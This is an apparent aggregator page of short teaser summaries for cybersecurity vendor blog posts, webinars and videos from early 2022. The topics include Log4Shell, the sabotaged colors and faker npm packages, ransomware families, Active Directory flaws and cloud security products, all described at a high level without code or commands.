Business security is often associated with larger companies where employees spend most of their time in front of computers. This stereotype can lead small business owners – especially ones outside the tech industry – to think they’ll never be targeted by hackers and don’t need to invest in security. It’s a mistake that cybercriminals are exploiting.

Manage Clinical Trial Site Submissions with Egnyte

The volume, variety, and velocity of data being collected in clinical trials is constantly increasing. It regularly surpasses what any one person or even a team of people can process, organize and monitor. Companies can no longer throw people at the problem, which is why many have turned to automation and AI to fill the gap.

Investigate Log4Shell exploits with Elastic Security and Observability

Following the discovery of Log4Shell, a vulnerability in Log4J2, Elastic released a blog post describing how users of our platform can leverage Elastic Security to help defend their networks. We also released an advisory detailing how Elastic products and users are impacted.

Cybersecurity: What to Expect in 2022

As the pandemic continues, organizations around the world are working hard to adapt to the “new normal.” This article highlights the key trends that we will face in 2022 and beyond. Ransomware attacks more than doubled in 2021 compared to 2020, with healthcare and utilities the most commonly targeted sectors. Moreover, attacks are getting more expensive, with the average ransomware payment leaping from US$312,000 in 2020 to $570,000 in 2021.

Monitoring your AWS environment for vulnerabilities and threat detection

Managing the security of your Amazon Web Services (AWS) environment requires constant vigilance. Your strategy should include identifying potential threats to your environment and proactively monitoring for vulnerabilities and system weaknesses that malicious actors might exploit. In a complex environment—such as your AWS account with a multitude of services, coupled with various architectures and applications—the ideal solution should be both comprehensive and straightforward.

Proxy Servers vs. VPNs: What's the Difference?

Both proxy servers and VPNs hide your IP address, allowing you to access websites anonymously, but only VPNs direct all network traffic through an encrypted tunnel. Another key difference is that VPNs address all network data while proxy servers only operate on an application level. The differences between the two solutions can be summarized as follows: Before diving into their technical differences, its important to first solidify your understanding of proxy servers and VPNs.

Enterprise Risk Management for Cloud Computing

Businesses have always had to manage risk – everything from operational, financial, or strategic risks; to other risks that are reputational, regulatory, or cybersecurity-related. So how does enterprise risk management (ERM) work today, when so many businesses are moving so much of their operations into the cloud? How can CISOs and other senior executives take traditional ERM principles and apply them to the cloud-based technology that underpins so much of the modern enterprise?

Key Elements of a Strong Risk Culture

Risk culture is the set of shared beliefs, attitudes, and understanding among a group, usually in a corporate environment, about risk and risk management practices. A company has a strong risk culture when all employees understand the business and regulatory landscape in which the organization functions, and what risks are acceptable within that landscape to achieve business objectives.

5 bad business results from invalid traffic

Bots are rampant across the web – in fact, around 50% of all web traffic is automated or invalid, i.e., doesn’t come from a real user with genuine interest. While some of this traffic is good and useful, for example, search engine crawlers and content aggregators, a high percentage is malicious. Hosting bad bots on your server can result in a plethora of problems for your website and business, from damage to your brand reputation to excessive financial and technical costs.

How to Outplay the Ransomware Playbook

Organizations across industries are increasingly concerned about their cybersecurity posture and overall ransomware preparedness – and rightfully so – with the 64% increase in attacks from 2019 to 2020 (304 million attacks worldwide in 2020). We have also seen a 2x increase in demand for ransomware preparedness assessments and exercises.

Procore + Egnyte | Optimizing Efficiency With An Integrated Solution

In this video, Procore’s Senior Director of Business Development, Kris Lengieza, discusses how mutual Egnyte and Procore customers can use the integrated software solution to work more efficiently. Integrated software solutions are critical to improved productivity, particularly for the construction industry. The increasing number of tools used per project makes a non-integrated environment very costly and time-consuming due to double entry, plus the need to jump between applications.

2022 Cybersecurity Predictions

Moving into 2022, looking back at the plentiful year of 2021, regarding security, we at the Cyberint Research Team will try and shed some light on the upcoming year: the key security risks and threats, and what we feel will change in the coming year. We will focus on the actions required to be as vigilant and protected as possible.

Is fighting cybercrime a losing battle for today's CISO?

At times, the quest to stay on top of web application security can seem futile. It seems as though the adversaries are always a step ahead, and all we can do is try our best to contain the breaches. In this blog, we’ll look at the root causes of concern for today's CISO and share some practical strategies to deter cybercriminals.

How to Address Cultural Change When Implementing a Cybersecurity Program

Cybersecurity is more important than ever before, with the number of corporate breaches increasing dramatically since 2020. In response to recent spikes in threats, many companies are working to create a more cybersecurity-focused employee base. The most effective way to do this is through a top-down, widespread shift in company culture, which places security among the top values.

Abusing Microsoft Office Using Malicious Web Archive Files

In November of 2021, we described several techniques used by attackers to deliver malware through infected Microsoft Office files. In addition to exploits like CVE-2021-40444, these infected documents frequently abuse VBA (Visual Basic for Applications) to execute their techniques, regardless of the final payload. Attackers also often use extra layers of protection to evade signature-based detections, like constructing PowerShell scripts and WMI namespaces at runtime, as done by Emotet.

Event: Bridging the data security and privacy gap

Security and privacy are inherently linked, yet decisions about each are often made in silos. It can be a challenge for teams of all sizes, with varied specialities, to connect the two domains. With that in mind, we’re pleased to announce our first live panel event: How do you bridge the gap between data security and privacy?

Malicious modifications to open source projects affecting thousands - Sysdig Secure

In the early days of 2022, two extremely popular JavaScript open source packages, colors.js, and faker.js, were modified to the point of being unusable. The reason for this event can be traced to various motivations, but what is worth mentioning is that several applications that employed those dependencies were involved. The two impacted packages can be used for different purposes in JavaScript applications. colors.js enables color and style customization in the node.js console.

New years resolution: Don't show my security tokens when hacking my demo application on stage

Traditionally, we start the new year with resolutions. We want to do more good things, like working, other things we try to eliminate. Considering the latter, my 2022 resolution is to stop accidentally exposing confidential information while I hack my application during demos on stage or similar. Yes, this new years resolution sounds very specific, and it has an excellent security horror story behind it…

Why Financial Services Companies That Value Agility & Security Pick Teleport

2022 feels a little different, doesn’t it? Every day I’m prepared to hear something new, something scary, or something exciting. These last couple of years have made it seem like we just never know what is coming next. It’s no different for financial services companies who have to be prepared for the unexpected, including disruptive technologies that can challenge their core businesses.

How to Improve Your Vendor Due Diligence Process (with Security Ratings)

You can't do business without your vendors. They support critical elements of your organization, from cloud storage services to payment processing to physical items like office supplies or physical components. Your vendors make your organization run more efficiently – but sometimes at a risk to your financial, reputational and operational resiliency.

Building Resilience to Financial Crime: the Convergence of Cyber Intelligence, AML, and Fraud Prevention

The idea of converging cyber intelligence, AML, and fraud prevention activities to eliminate the gaps between these silos of financial crime risk management has been discussed for years. However, recent developments in global real-time payments, open banking, and booming digital transactions have escalated the need for this convergence. In this era of instant payments and CNP transactions, traditional siloed approaches to financial crime prevention are loosing their effectiveness.

Data Loss Prevention (DLP) on Jira and Confluence Data Center & Server Editions

Jira and Confluence house high volumes of customer information, tickets, notes, wiki articles, and more. To scan Jira and Confluence Data Center or Server editions, you can use Nightfall’s APIs to scan data at-rest in these silos. In this article, we’ll walk through how you can run a full historical scan on your Jira and Confluence data to discover sensitive data, like API keys and PII. The output will be a report detailing the sensitive findings discovered in your environment.

The 5 Stages of a Credential Stuffing Attack

Many of us are fond of collecting things, but not everyone is excited about Collections #1-5. In 2019, these Collections, composed of ca. 932 GB of data containing billions of email addresses and their passwords, made their way around the Internet. These collections weren’t breaches but compilations of emails and passwords that had been gathered. Even after repeat entries were whittled down, the collection still contained billions of distinct address and password combinations.

Confidence In Action: Investment Bank Uses Forward Networks To Verify Automation Software

Several years ago, a global investment bank embarked on an ambitious plan to automate its network configuration deployment process and use internal teams to run all aspects of network operations. The move was made, in part, because of the fluidity of the bank's network, which is constantly undergoing configuration changes.

What You Should Know About npm Packages 'colors' and 'faker'

On January 8, 2022, the open source maintainer of the wildly popular npm package colors, published colors@1.4.1 and colors@1.4.44-liberty-2 in which they intentionally introduced an offending commit that adds an infinite loop to the source code. The infinite loop is triggered and executed immediately upon initialization of the package’s source code, and would result in a Denial of Service (DoS) to any Node.js server using it.

Endpoint Enigma | Is 2022 the Beginning of the End of On-Prem Security?

Nearly two years after we were forced to experiment with remote work, 2022 will be an inflection point for both threats and cybersecurity solutions. Tune into our annual predictions episode to hear what Lookout CTO of SASE Products Sundaram Lakshmanan thinks will happen next year. We'll be discussing everything from software supply chains to threat hunting and data protection.

Endpoint Enigma | Let's Get Real About Zero Trust: How To Assess Your Security Posture

While most of us understand Zero Trust conceptually, the path to Zero Trust is a complex and constantly evolving journey. In this episode, host Hank Schless is joined by Andy Olpin, Solutions Engineer at Lookout to scale back all the marketing noise surrounding the term and discuss how organizations can pragmatically get started with Zero Trust.

Search History

Easily access your search history to quickly find the Egnyte content you’ve looked for previously. Whether your past search took place on the Web UI, desktop, or mobile, Egnyte remembers past queries and search filters. You’ll be able to quickly review old searches, adjust any previously added filters, and track down the content you need. Locate your files and folders effortlessly using Egnyte’s search history!

What Is FIM (File Integrity Monitoring)?

Change is prolific in organizations’ IT environments. Hardware assets change. Software programs change. Configuration states change. Some of these modifications are authorized insofar as they occur during an organization’s regular patching cycle, while others cause concern by popping up unexpectedly. Organizations commonly respond to this dynamism by investing in asset discovery and secure configuration management (SCM).

Understanding LSA Protection

Securing your Windows servers and Windows 10 running is vital, especially given today’s sophisticated threat landscape. These are usually the first machines to be compromised in an attack through exploitation of the weakest link in the chain — the user. Through trickery and social engineering, threat actors gain access to these machines and then seek to move laterally and elevate their privileges.

Your Data is Everywhere: Here are the Critical Capabilities of a Modern DLP

In some ways, IT teams had a great life in the early 2000s. Data was stored inside data centers and accessed through known ingress and egress points like a castle with a limited number of gates. As a result, organizations had control over exactly whom and what devices could access company data. This is no longer the case. With users accessing cloud applications with whatever networks and devices are at their disposal, those defense mechanisms have become inadequate.

Introducing next-generation firewall from Palo Alto Networks to support 5G-enabled IoT, OT and IT use cases

Enterprises know they need defenses integrated into each aspect of their network while not being an inhibitor to innovation. Digital transformation realized through new 5G-enabled IoT, Operational Technologies (OT) and IT use cases are no exception. Therefore, security teams need to take a closer look at the best technology to support this innovation.

noPac Exploit: Latest Microsoft AD Flaw May Lead to Total Domain Compromise in Seconds

Microsoft recently published two critical CVEs related to Active Directory (CVE-2021-42278 and CVE-2021-42287), which when combined by a malicious actor could lead to privilege escalation with a direct path to a compromised domain. In mid-December 2021, a public exploit that combined these two Microsoft Active Directory design flaws (referred also as “noPac”) was released.

Understanding Insecure Direct Object References (IDOR)

IDOR is a broken access control vulnerability where invalidated user input can be used to perform unauthorized access to application functions. IDOR can result in sensitive information disclosure, information tampering etc. This issue was previously part of OWASP top 10 2007, later it was merged with OWASP top 10 A5 Broken Access control vulnerability.

CrowdStrike Services Offers Incident Response Tracker for the DFIR Community

During a recent client engagement for a tabletop exercise (TTX), it became apparent that the client did not have a methodology for tracking indicators and building an incident timeline. The CrowdStrike Services team wanted to provide more information to our client on how incidents can and should be tracked, but nothing was available in the public domain.

Power the SOC of the Future with the DataLinq Engine - Part 2

In my first blog in this series, we discussed the importance of data to the modern SOC, and the unique approach of ThreatQ DataLinq Engine to connect the dots across all data sources, tools and teams to accelerate detection, investigation and response. We developed the DataLinq Engine with the specific goal of optimizing the process of making sense out of data in order to reduce the unnecessary volume and resulting burden.

CISOs: Why the Rezilion - Tenable Integration is a Game Changer for Product Security and Devops

As the frequency of new products released rises and as the attack surface keeps growing, most companies are faced with a common problem – a growing vulnerability workload. Their vulnerability scanners report countless vulnerabilities and there is simply not enough resources or time to fix all of these vulnerabilities, leaving their networks vulnerable and exploitable.

What You Need to Know About Adding a SaaS Component to Your Hardware or Software Business

Many market-leading companies who have dominated their respective sectors with hardware or on-prem/installable software solutions are turning to SaaS offerings to fuel the next phase of their growth. Why? Simple. Market valuations are much higher for SaaS companies than they are for traditional software and hardware companies. The median multiple on earnings for a SaaS company is 12.7x as of Q3 2021 according to venture capitalist Jamin Ball who tracks the Public Cloud Software (e.g.

Building Out SaaS Incident Response Capabilities

Every functioning security team has an incident response plan. Advance strategizing and preparation are absolutely imperative to ensure a quick response to data breaches, ransomware, and numerous other challenges, but most companies first developed that plan years, if not decades, ago and now only revisit it periodically. This is a problem. How many organizations have developed a separate incident response plan to address the unique risks of the software-as-a-service (SaaS) era? Far too few.

Netskope Threat Coverage: Night Sky

Naming themselves Night Sky, a new ransomware family was spotted on the first day of 2022, by the MalwareHunterTeam. They appear to work in the RaaS (Ransomware-as-a-Service) model, similar to other ransomware groups like REvil, LockBit, and Hive, publishing stolen data exfiltrated throughout the attack in a deep web site if the ransom is not paid by the victim. Currently, there are two companies listed on their deep web site, where the group has published the victim’s allegedly stolen data.

Laptop running slow? You might have been cryptojacked.

It’s always frustrating when your laptop starts to slow down. The more you click, the more it seems to stutter and have a good think about everything you ask it to do. Joining video calls and even opening documents becomes a chore. Normally, this is a sign to free up some storage space or request a new device/component from the IT department. However, an unusually slow laptop can also be the sign of something more sinister – cryptojacking.

Devo's 2022 Cybersecurity Predictions: Part Three

In part two of our 2022 cybersecurity predictions series, Devo Security Engineering Director Sebastien Tricaud explained Web3 and new security testing trends. While cybersecurity tools and approaches are certainly evolving quickly, so are cybercriminals. Here are my insights on cyberthreats and attacks we should expect to see more of this year.

Technical Advisory: Zero-day vulnerability in Apache Log4j Library Allows Remote Code Execution

On December 9th, 2021, Apache disclosed CVE-2021-44228 (colloquially referred to as Log4Shell), a remote code execution vulnerability in the Apache Log4j library, a Java-based logging tool widely used in applications around the world. A highest possible severity score of 10 has been assigned to this exploit.

How To Manage The Hidden Impacts of Data Leak With Cloud DLP

Data leaks are a type of data loss threat that often fly under the radar — making them potentially more damaging than a malware or ransomware attack. Compared to data breaches, data leaks put customer information at risk accidentally. Data leaks can lead to credit card fraud, extortion, stolen IP, and further attacks by cybercriminals who seek to take advantage of security misconfigurations.

How to Map SOC Analyst Skills With Experience Level

Security operations centers (SOCs) exist to deliver sustained monitoring and response capabilities. Staff members are a core pillar of this mission. Each SOC should have clearly articulated roles and levels for its personnel. This helps to establish fair practices for hiring, training, promotion, compensation and performance expectations.

What Oil and Gas Companies Must Do to Counter Cyber Threats

The oil and gas industry’s global supply chain uses a vast array of information technology (IT) and operational technology (OT) systems. These systems require constant cybersecurity protection to ensure energy flows efficiently and productively around the world to meet global needs. Hackers know that IT and OT systems are often interdependent and closely linked. In fact, the recent Colonial Pipeline attack resulted from the successful breach of Colonial’s IT network.

TellYouThePass Ransomware Analysis Reveals a Modern Reinterpretation Using Golang

The TellYouThePass ransomware family was recently reported as a post-exploitation malicious payload used in conjunction with a remote code execution vulnerability in Apache Log4j library, dubbed Log4Shell. TellYouThePass was first reported in early 2019 as a financially motivated ransomware designed to encrypt files and demand payment for restoring them. Targeting both Windows and Linux systems, TellYouThePass ransomware re-emerged in mid-December 2021 along with other ransomware like Khonsari.

FIN7 Sends BadUSB Devices to U.S. Businesses as Part of Targeted Ransomware Campaign

First reported by The Record, the FBI has issued a new security Flash Alert warning organizations that the cybercrime gang FIN7 is again sending malicious USB drives to U.S. business targets in the transportation, insurance and defense industries through the U.S. Postal Service and United Parcel Service. This latest wave of attacks began in August 2021 with FIN7, which is also known as Carbanak Group and Navigator Group. The drives can be recognized by the LilyGo label on the case.

Random but Memorable - Episode 8.6: Games Revival Outtake Special

Is there a better way to ring in the New Year than with the revival of all Random but Memorable's iconic games? What the Phrase, Real or Not Real, Play Your Passwords Right, Three Word Password, Ridiculous Requirements – whichever's your favourite, the gang's all here! Not only that, we've also included some bonus, long-requested outtakes (with the help of a trusty soundboard!) Listen to the chaos unfold as we uncover some lost gems from the show. (Some of which probably should have stayed lost...)

Nuvias UC Fuels Its Growth In Europe Through Alliance Technologies GmbH Acquisition

As part of its exciting and fast-paced growth, driven by increased demand from its customer base to provide best of breed solutions across Europe, Nuvias UC announces the acquisition of Alliance Technologies GmbH, a UC specialised, value added distributor founded in 2001.

Multi-Factor is incomplete without backup codes

I was logging into one of my favorite online shopping sites the other day, and, as with all my other sites, I was presented with the multi-factor authentication prompt to complete the login process. Anyone who knows me, knows that I have been a long-time supporter of multi-factor, or 2-step verification of any kind.

Code Dx wins CybersecAsia award for Best in Application Development Security

Code Dx was recognized for its leadership in application security development. Learn how Code Dx helps to build trust in your software. Synopsys is proud to announce that Code Dx® has won the 2021 CybersecAsia Reader’s Choice Award for Best in Application Development Security.

URL confusion vulnerabilities in the wild: Exploring parser inconsistencies

URLs have forever changed the way we interact with computers. Conceptualized in 1992 and defined in 1994, the Uniform Resource Locator (URL) continues to be a critical component of the internet, allowing people to navigate the web via descriptive, human-understandable addresses. But with the need for human readability came the need for breaking them into machine-usable components; this is handled with URL parsers.

SCA Should Be in Your Toolbox to Address Supply Chain Risk

Software composition analysis (SCA) tools provide automated visibility throughout the software development life cycle (SDLC) for more efficient risk management, security, and license compliance. As organizations accelerate their digital initiatives, they rely on development teams both internally and externally to build the applications that will help them move forward. But applications are also a popular target for criminals.

Getting Vulnerability Management Right in Healthcare

In this second of a five-part series of posts on why strong vulnerability management is so vital for cybersecurity programs, we look at the need for effective vulnerability management in the healthcare sector. Like financial services, healthcare is a highly-regulated industry and it’s also among the most common targets of cybercriminals.

What is a Distributed Cloud Architecture? Top 4 Security Considerations

By 2025, there will be more than 100 zettabytes of data stored in the cloud – that’s a lot of data! With more applications needing to process a significant amount of data in real-time, there is a shift in demand for distributed cloud and edge computing. Fortunately, the distributed cloud brings many impressive benefits to organizations – generating immense cost savings, greater scalability, and reaching resource-intensive business demands.

How to source the right tools to scale an AppSec programme

Everyone’s development is different, it stands to reason everyone’s perfect security toolkit will also be different. But finding the right tools to suit your project, and making the most out of those tools shouldn’t have to be a headache. In the field of application security, there are literally thousands of security tools to choose from that may help the development, security and longevity of your projects.

Why marketers can't ignore bot traffic on their sites in 2022

As a thorn in the side of marketing teams of all sizes, awareness of ad fraud has grown in recent years due to the sheer amount of money it can cost advertisers. In one famous case, Uber discovered fraudulent app installs attributed to its ads had cost the company $100 million. But it’s not just overtly malicious activity like ad fraud that marketing budget-setters need to be concerned about. Marketers must be aware of the potential damage bots of all kinds can do, intentionally or otherwise.

Detecting Malware Script Loaders using Remcos: Threat Research Release December 2021

Nowadays, malware used to have several stages before it fully compromised the targeted host or machine. The very well-known initial stager is the “phishing email” that contains a malicious macro code or malicious URL link that will download either the actual loader or the next stager to download the actual payload.

Understanding Monetary Authority of Singapore's (MAS) Guidance: Safeguarding Your Financial Institution's Cloud Environment

As a major financial hub in Asia and globally, Singapore is very aware of the challenges facing the financial industry, especially the accelerated digital transformation that stemmed from the COVID-19 pandemic. In response to the sector’s increased exposure to cloud technology, the Monetary Authority of Singapore (MAS) has released a guideline to address cybersecurity risks associated with the adoption of public clouds.

What SecOps Teams Can Expect in 2022

Traditionally, most organizations have had siloed departments wherein teams’ activities are highly separated and the objectives within organizational structures are divided. This operational methodology has brought about friction – especially within the IT department, where developers and ITOps lack collaboration.

Don't Let Supply Chain Attacks Get the Best of You

The past two years have brought about significant disruptions to global supply chains. Recent headlines have focused on labor shortages and their impact on everything from product production to shipping delays. However, another, more significant supply chain issue should be top of mind for every organization: supply chain attacks.

Hello CISO - Episode 1 (Part 2): The Downfall of On-Premise Security

In the beginning, there was on-premise. Then things got complicated. Hello CISO is a new series aimed at Chief Information Security Officers, IT security teams, and all other members of an organization responsible for maintaining the safety and integrity of the business and its operations. "The responsibilities of the modern CISO are expanding as digital infrastructure grows more complex. It’s no longer feasible to protect against every single threat, so you have to think more strategically. We need to work smarter, not harder – and that’s what I want to explore in this series."

Offline Access on a Mobile Device

The Egnyte Mobile App gives you access to content from your smartphone or tablet. For those times you find yourself without an internet connection, you can still easily get to content you’ve marked for offline access. From the ellipsis menu, simply select Mark Offline to keep a copy of the file locally on your device. Your offline content can be found under the offline tab and where you can easily update your local copies to ensure you have access to the latest versions, and remove them to free up space on your device.

Table Calculations

Use table calculations to roll up Total/Percentages into a single value for summary visualizations. Netskope, the SASE leader, safely and quickly connects users directly to the internet, any application, and their infrastructure from any device, on or off the network. With CASB, SWG, and ZTNA built natively in a single platform, Netskope is fast everywhere, data-centric, and cloud smart, all while enabling good digital citizenship and providing a lower total-cost-of-ownership.

Digital-First SecOps: A CISO Perspective

Businesses of all types, and across all verticals, have gone digital-first. This shift enables many benefits, such as greater scalability and speed. But it also amplifies the security and compliance challenges that arise from digital systems. For CISOs, this shift amplifies the need to apply the same level of automation, speed, and business-wide accessibility for security that digitization has brought to other aspects of the business. In short, modern businesses need to adopt a digital-first approach to SecOps itself.

How Will ISO 27701 and the GDPR Affect Your Organization?

Companies today face increasing pressure to implement strong cybersecurity controls. While the U.S. has no comprehensive cybersecurity law, many organizations still fall under state, international, or industry regulations. Two of the most prominent controlling publications are the General Data Protection Regulation (GDPR), and the ISO 27701 standard. One has the force of law, and the other is a guiding framework, respectively. Both of these documents apply to an increasing number of businesses.

Can We Lighten the Cybersecurity Load for Heavy Industries?

One of the biggest problems with the IT / OT convergence in critical infrastructure is that much of the legacy hardware cannot simply be patched to an acceptable compliance level. Recently, Sean Tufts, the practice director for Industrial Control Systems (ICS) and Internet of Things (IoT) security at Optiv, offered his perspectives on where the industry has been, where it is going, and some of the progress being made to secure critical infrastructure.

Open source maintainer pulls the plug on npm packages colors and faker, now what?

On January 8, 2022, the open source maintainer of the wildly popular npm package colors, published colors@1.4.1 and colors@1.4.44-liberty-2 in which they intentionally introduced an offending commit that adds an infinite loop to the source code. The infinite loop is triggered and executed immediately upon initialization of the package’s source code, and would result in a Denial of Service (DoS) to any Node.js server using it.

What is Domain Hijacking? Tips to Protect Yourself

Domain hijacking is the act of domain name theft. It can happen to individuals or organisations and it’s increasing in frequency. The name may be hijacked by someone else who passes themselves off as you, tricks your domain registrar into transferring your domain to them, or hacks into your account (sometimes through phishing) and transfers it themselves.

Weekly Cyber Security News 07/01/2022

A selection of this week’s more interesting vulnerability disclosures and cyber security news. For a daily selection see our twitter feed at #ionCube24. What a start to 2022…. I happened to be on Twitter New Year’s Day and spotted a flurry of tweets about MS Exchange. Digging deeper it looks like a lot were firefighting a serious bug.

FTC highlights the importance of securing Log4j and software supply chain

Earlier this week, the FTC issued a warning to companies regarding the Log4j vulnerability. Given the rampant exploitation of the recently discovered vulnerabilities in this ubiquitous open source logging package, it’s encouraging to see the agency take this rare step, beginning to form a firm stance on software supply chain security. Although this increased scrutiny from the FTC may at first seem daunting, violations can be remediated with the right practices.

Interview with CTO Kathleen Moriarty

For the newest instalment in our series of interviews asking leading technology specialists about their achievements in their field, we’ve welcomed Kathleen Moriarty, Chief Technology Officer at the Center for Internet Security. During her tenure in the Dell EMC Office of the CTO, Kathleen had the honour of being appointed and serving two terms as the Internet Engineering Task Force (IETF) Security Area Director and as a member of the Internet Engineering Steering Group from March 2014-2018.

Clearing Security Hurdles Faster to Drive Business Forward in 2022

As organizations look to take their 2022 security concerns head-on, they need to create resilient cybersecurity programs that help them make smarter, faster, informed decisions. In our recent webinar, I had the pleasure of chatting with security professionals Mike Wilkes from SecurityScorecard, Scott Fuller from Access Health, and John Beal from St. Charles Health. They discuss the challenges they face and how their security plans for 2022 to mitigate risk across their entire ecosystem.

How to stay creatively inspired while working from home

Creativity can be fickle. One day, your brain is full of bright ideas you’re keen to jot down, develop, and share with others. The next day, you have nothing. Zilch. Not even a flicker of an idea. You suddenly feel like a world-class restaurant that’s run out of ingredients.

Attack Misuses Google Docs Comments to Spew Out "Massive Wave" of Malicious Links

Security researchers say they have seen a “massive wave” of malicious hackers exploiting the comment feature in Google Docs to spread malicious content into the inboxes of unsuspecting targeted users. According to a blog post published by Avanan, the comments functionality of Google Docs, as well as its fellow Google Workplace web-based applications Google Sheets and Google Slides, is being exploited to send out malicious links.

Why You Need an Adversary-focused Approach to Stop Cloud Breaches

It should come as little surprise that when enterprise and IT leaders turned their attention to the cloud, so did attackers. Unfortunately, the security capabilities of enterprises have not always kept up with the threat landscape. Poor visibility, management challenges and misconfigurations combine with other security and compliance issues to make protecting cloud environments a complex endeavor.

How to Set Up Two-Factor Authentication for SSH

One way to enhance SSH login security is by using two-factor authentication (2FA). This approach forces an administrator to self-identify with an additional security verification in addition to the local admin credentials. This tutorial guides you through setting up Google Authenticator PAM to enable 2FA for users connecting to SSH on a Linux server. We’ll use nano as our editor in examples.

The Top Cyber Attacks of December 2021

Things tend to slow down for many businesses at the end of the year. As the holidays roll in and employees take time off with their families, December is generally a time to take stock of what transpired over the year and start looking ahead to the next one. Unfortunately, that’s not how cybercriminals operate.

Six-Figure Savings: How A Financial Institution Banked On Forward Enterprise For Massive Returns

As one large, global financial institution prepared for employees to return to the office, its IT team identified a significant issue with the company's more than 8,000 access switches. The switches in question were used to provide connectivity to IP Phones – a crucial part of people's work across virtually all areas of the company.

Six Pillars of DevSecOps

DevOps and Security. One encourages speed, agility, iterative learning, enabling technology to keep up with the pace of business. The other wants to keep you safe, slows things down, crosses all the T's and dots all the I's. They seem to be at odds with one another — but do they need to be? DevSecOps says no, that’s not the way it has to be.

Behind the Buzzword: Four Ways to Assess Your Zero Trust Security Posture

With just about everything delivered from the cloud these days, employees can now collaborate and access what they need from anywhere and on any device. While this newfound flexibility has changed the way we think about productivity, it has also created new cybersecurity challenges for organizations. Historically, enterprise data was stored inside data centers and guarded by perimeter-based security tools.

Endangered data in online transactions and how to safeguard company information

This blog was written by an independent guest blogger. Online transactions are essential for every modern business. From online shopping to banking, transferring funds, and sending invoices, online transactions ensure utter convenience and efficiency. However, the familiarity of making financial transactions online can make people forget about security and all the dangers that they may be facing. On top of that, new cybersecurity threats keep popping up constantly.

SSH Client Config Files and How to Use Them

SSH client configuration files allow us to connect to servers with pre-configured commands. This saves typing each SSH command parameter when logging into a remote machine and executing commands on a remote device. This article will examine secure shell (SSH) client configuration (config) files and their functions. Specifically, we will show an example of an SSH client config file to learn how to use these files before creating an example config file that connects to a fictitious server.

Proactive Cybersecurity: How to Stay Ahead of Today's Threats

For many organizations, cybersecurity is an overwhelming challenge. New threats emerge seemingly in the blink of an eye, and IT and security teams are constantly reacting to the moves of bad actors who always remain one or two steps ahead and get to dictate where and when their attacks are carried out. As you might expect, a reactionary approach to cybersecurity is not ideal. It’s typically borne of necessity due to undermanned teams or inadequate resources.

Security Cloud Considerations for Delivering Security Service Edge (SSE)

In recent blogs, we’ve explored the role of Security Service Edge (SSE) technologies as part of a SASE architecture, and the key differences between SSE and SASE. But so far, we’ve focused more on overall functionality than on its realization and what SSE means from a cloud design and implementation perspective. In this post, we shift gears to put a spotlight on networking and infrastructure as it relates to security clouds.

Fourth Party Risk Management Explained

Most organizations use at least some (and perhaps many) external vendors in their daily operations, sometimes even to provide mission-critical services or supplies; we’ve discussed them before as third-party vendors and the risks they bring. Indeed, most businesses today already consider third-party risk management in their overall cybersecurity protocols.

What You Should Know About the Rise in AWS S3 Security Data Breaches

Amazon Web Services (AWS) is a cloud platform designed to meet the growing demand for cloud computing worldwide. AWS provides a set of cloud services such as storage, analytics, blockchain, business applications, security, and machine learning. Within this cloud environment is Amazon Simple Storage Services (S3), a cloud storage solution bringing scalability, data availability, security, and performance to companies of any size through so-called “buckets” or data containers.

CISO's Corner: The Four Best Cybersecurity Investments You Can Make During the Cyber Talent Shortage

The need for strong cybersecurity has reached critical mass. Seventy-six percent of security leaders have reported an increase in cyber-attacks over the past year -- accelerated by the COVID-19 pandemic and a rapid shift from an in-office to a remote workforce and on-premises to cloud infrastructure.

What is Encryption? Difference between symmetric and asymmetric encryption

Encryption is the act of encoding information to make it unreadable for anyone other than those who are authorized to read it. There are two types of encryption: symmetric and asymmetric. Symmetric encryption uses the same key to encode and decode data, while asymmetric encryption uses different keys - one public key that can be shared with everyone, and one private key only known by the owner. In this video, we discuss the meaning of encryption and what it is used for. We also go over what asymmetric and symmetric encryption are.

Decibel Therapeutics Transforms Clinical Trial Document Management with Egnyte

The documentation around clinical studies is large and diverse – and it all must adhere to GxP standards. Learn how Heather Wolff, Vice President, Clinical Development Operations at Decibel Therapeutics, and her team of data managers, clinical operation experts, regulatory operations, medical writers, and biostats use Egnyte to streamline their compliance and data management processes. And, to learn more about how Egnyte helps other life sciences companies store, share, and audit critical documentation around clinical trials, visit: Egnyte.com/solutions/life-sciences.

The Missing Pieces in Securing your SDLC

Navigating the world of secure software development is hard. There is a lot of noise and not enough time to investigate everything thoroughly. Make your life and the lives of your colleagues easier by building a world-class DevSecOps automation pipeline. Automate feedback delivery in a way that makes sense. It doesn’t have to be hard; automate the pain away!

Demystifying DevOps-Pros, cons, dos & don'ts

We hear a lot about DevOps but how do we turn it from myth into reality? In this panel with Waleed Arshad, Community Manager at Snyk, Frank Dornberger, Team lead of DevSecOps at movingimage EVP GmbH, and Idir Ouhab Meskine, Staff Solutions Engineer at Splunk, we're go over: Waleed Arshad, Community Manager at Snyk Frank Dornberger, Teamlead DevSecOps at movingimage EVP GmbH Idir Ouhab Meskine, Staff Solutions Engineer at Splunk

CloudCasa Introduces New Starter Plan, Bring-Your-Own Storage, and more Application Support for Kubernetes Backup-as-Service

The CloudCasa elves has been busy in their workshop for the past few months, and in December we delivered a stocking full of brand-new Kubernetes data protection goodies just in time for the holidays!

AT&T teams with Cisco to create new managed SASE offering

Whether organizations call it digital transformation or just using technology to create opportunities for new, easier ways to work, one thing is certain. Businesses increasingly need to find simpler ways to securely build and manage new kinds of connections that support an era of: This is exactly the drive behind the latest collaboration between the cybersecurity and networking experts at AT&T and Cisco.

15 simple steps to stay secure at work without burning yourself out

No-one wants to feel burned out at work. Battling physical or emotional exhaustion can quickly impact your health, happiness, and any sense of professional fulfillment. That in turn can affect your productivity and the likelihood that you’ll make an honest mistake that puts your company’s data at risk.

Healthcare systems under attack

In October 2021, the IT systems of the Israeli healthcare system suffered a ransomware attack from which it took weeks to recover. Although the motive for the cyberattack on this occasion was not geopolitical but financial, government sources said they feared that far more dangerous incidents against this sector could be carried out by groups linked to foreign powers such as Iran.

Secure DevOps on Microsoft Azure: Reduce Cloud & Container Risk

Microsoft Azure is a great choice for enterprises looking to quickly build and deploy apps to the cloud. However, cloud teams must simultaneously consider how to implement DevSecOps practices to reduce, manage and avoid risks. Sysdig is collaborating with Microsoft to simplify cloud and container security and deliver robust SaaS-based solutions for the Azure ecosystem.

ICYM: 5 Major Considerations for Slack Security in 2022

Last month, on December 8, we hosted a webinar alongside Bluecore CISO Brent Lassi to discuss data security risks facing high-growth organizations like his on SaaS systems like Slack. With 2022 just beginning, we wanted to share 5 important lessons about Slack and SaaS security that are worth keeping in mind this year.

Developer security resolutions for 2022

